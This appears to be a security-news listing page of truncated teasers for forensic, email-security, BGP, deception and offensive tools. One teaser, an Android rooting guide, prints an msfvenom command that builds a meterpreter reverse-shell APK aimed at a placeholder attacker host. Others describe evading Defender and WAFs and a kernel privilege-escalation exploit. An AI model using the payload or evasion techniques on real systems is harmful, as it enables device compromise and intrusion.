Volatility Binaries – A Comprehensive Guide To Compiling And Using Volatility Tools
Explore the essentials of Volatility binaries with our detailed guide. This article provides easy access to compiled binaries of Volatility, complete with SHA1 hashes and compilation dates. Whether you're a seasoned analyst or a newcomer, learn how to compile these tools on your own to enhance your forensic capabilities. For any issues, BinarySHA1 hashCompiled OnVol2.6.1/vol2.exe601ecac617185c8f811edee30a449a46fb6ff8a4N/AVol3/Vol3-2.7.0/vol3.exe3d70bd87a6a189288008a093af31ffaaa85867962024-06-07Vol3/Volshell/volshell3.exe9e32f767fcf0d6e11c2c2f873bcea00b56b271662024-06-07Vol3/Vol3-2.5.2/vol.exea2c669d7ff847707c3717cd3cef7310c953306d02024-02-14 Note: The binaries and hashes provided are as...
Mailgoose – Ensuring Email Security With SPF, DMARC, And DKIM Verification
Mailgoose is a web application that allows the users to check whether their SPF, DMARC and DKIM configuration is set up correctly. CERT PL uses it to run bezpiecznapoczta.cert.pl, an online service that helps Polish institutions to configure their domains to decrease the probability of successful e-mail spoofing. Under the hood, Mailgoose uses checkdmarc and dkimpy, among others. Quick Start | Docs Features For an up-to-date list of...
BGPipe – BGP Reverse Proxy And Firewall
An innovative open-source tool that revolutionizes BGP management by acting as a reverse proxy and firewall. Leveraging the powerful BGPFix library, bgpipe enhances security, visibility, and control over BGP sessions. From seamless JSON conversions to robust router control mechanisms, explore how bgpipe secures and streamlines BGP communications. This project provides an open-source BGP reverse proxy and firewall based on the BGPFix...
Sinon – Modular Windows Burn-In Automation With Generative AI For Deception
Sinon is a modular tool for automatic burn-in of Windows-based deception hosts that aims to reduce the difficulty of orchestrating deception hosts at scale whilst enabling diversity and randomness through generative capabilities. It has been created as a proof-of-concept and is not intended for production deception environments. It would likely be better suited to having content pre-generated and built...
HackSys Extreme Vulnerable Driver (HEVD) – BufferOverflowNonPagedPoolNx Exploit
This repository contains an exploit for the BufferOverflowNonPagedPoolNx vulnerability in HackSys Extreme Vulnerable Driver (HEVD). The exploit targets Windows 10 Version 22H2 (OS Build 19045.3930) and demonstrates a technique to achieve privilege escalation from a low-integrity process to SYSTEM. Exploit Overview The exploit leverages the BufferOverflowNonPagedPoolNx vulnerability to create a "ghost chunk" through Aligned Chunk Confusion in the NonPagedPoolNx region. This ghost chunk is then manipulated to achieve...
Android Autorooter Exploit : A Step-By-Step Guide
"Android Autorooter" delves into the cutting-edge possibilities of exploiting Android vulnerabilities to achieve root access. This article guides you through setting up a self-executing Android exploit using CVE-2024-0044, a critical security flaw. Follow step-by-step instructions to craft and deploy a meterpreter payload, turning theoretical vulnerability into practical attack capability. Give This A Try msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk Create...
PPLBlade: Advanced Memory Dumping and Obfuscation Tool
Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk. Key functionalities: Bypassing PPL protection Obfuscating memory dump files to evade Defender signature-based detection mechanisms Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump) Overview of the techniques, used in this tool can be found...
IFL – Interactive Functions List : Enhancing IDA Pro With Advanced Function Navigation nd Import Features
Discover the power of the IFL - Interactive Functions List, a dynamic plugin designed to elevate your experience with IDA Pro. This user-friendly tool revolutionizes how you navigate between functions and their references, making your analysis more efficient. Whether you're importing reports from tools like PE-sieve or navigating in either a sleek dark or light theme, IFL has you...
Web3 Security Researcher Roadmap – Mastering Solidity And Smart Contract Audits By 2024
Embark on a journey to become a Web3 security expert with our comprehensive 2024 roadmap. This guide delves deep into mastering Ethereum, Solidity, and essential security practices through strategic courses, hands-on exercises, and community audits. Equip yourself with the knowledge and skills to navigate the complex landscape of smart contract security and blockchain vulnerabilities. An updated (by 2024) roadmap to...
Awesome TLS – Evading WAFs With Advanced Burp Suite Extension
This extension hijacks Burp's HTTP and TLS stack, allowing you to spoof any browser TLS fingerprint (JA3). It boosts the power of Burp Suite while reducing the likelihood of fingerprinting by various WAFs like CloudFlare, PerimeterX, Akamai, DataDome, etc. It does this without resorting to hacks, reflection or forked Burp Suite Community code. All code in this repository only leverages...